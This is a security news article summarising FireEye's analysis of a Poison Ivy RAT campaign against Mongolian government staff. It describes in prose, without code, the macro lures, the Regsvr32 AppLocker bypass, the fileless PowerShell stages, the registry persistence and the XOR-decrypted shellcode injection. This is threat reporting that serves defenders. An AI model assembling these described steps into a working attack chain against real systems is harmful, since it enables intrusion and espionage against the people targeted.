Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Poison Ivy RAT Campaign Leverages New Delivery Techniques

A recently observed campaign using the Poison Ivy remote access tool (RAT) against individuals within the Mongolian government uses publicly available techniques that haven’t been observed in previous campaigns, FireEye reports.

A recently observed campaign using the Poison Ivy remote access tool (RAT) against individuals within the Mongolian government uses publicly available techniques that haven’t been observed in previous campaigns, FireEye reports.

The Poison Ivy backdoor has been around for several years, targeting organizations all around the world, and was associated with a China-linked threat actor known as menuPass, Stone Panda and APT10. The malware packs capabilities such as key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more.

FireEye didn’t attribute the new campaign to a specific actor, and told SecurityWeek in an email that it can’t make direct connections to a particular group at this time. The security firm said it lacks visibility into what the actors did and admitted it doesn’t know if they were successful. Still, the company did say that “espionage is a reasonable assumption for their motives.”

What the newly observed campaign did show, however, was that the actor behind it is up-to-date with recent social engineering and evasion techniques and isn’t shy when it comes to using them. The attacks leveraged an AppLocker bypass that was publicly revealed last year, as well as fileless execution and persistence, and benign documents to minimize user suspicion of malicious activity.

The malware was distributed via Word documents with malicious macros, and the threat actor was using social engineering to trick users into enabling these macros. The malicious documents were delivered via email, claiming to contain instructions for logging into webmail or information regarding a state law proposal, FireEye explains.

The malicious macros in the documents were designed to invoke Regsvr32, a command-line utility designed for registering DLLs in the registry, to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique was demonstrated last year to effectively bypass AppLocker, the Microsoft application whitelisting solution that prevents unknown executables from running on a system.

In this campaign, the malicious SCT file was designed to invoke WScript to launch PowerShell in hidden mode with an encoded command, FireEye reports. After the PowerShell command is decoded, another layer of PowerShell instructions emerges, serving two purposes: to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet; and to download and run another PowerShell script named f0921.ps1.

The third stage PowerShell script configures an encoded command persistently as base64 string in the HKCU: ConsoleFontSecurity registry key, along with an HKCUCurrentVersionRunSecurityUpdate value to launch the encoded PowerShell payload stored in the previously configured key. Thus, the PowerShell payload is executed every time the user logs in to the system.

Advertisement. Scroll to continue reading.

A fourth stage PowerShell script in the HKCUConsoleFontSecurity registry borrows from the publicly available Inject-LocalShellCode script from PowerSploit to inject shellcode, researchers explain. The shellcode has a custom XOR-based decryption loop that uses a single byte key (0xD4), and was designed to inject the Poison Ivy backdoor into userinit.exe. The decrypted shellcode also revealed content and configuration related to Poison Ivy.

“Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host,” FireEye says.

Related: August Stealer Uses PowerShell for Fileless Infection

Related: Windows AppLocker Bypassed to Execute Remote Scripts

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.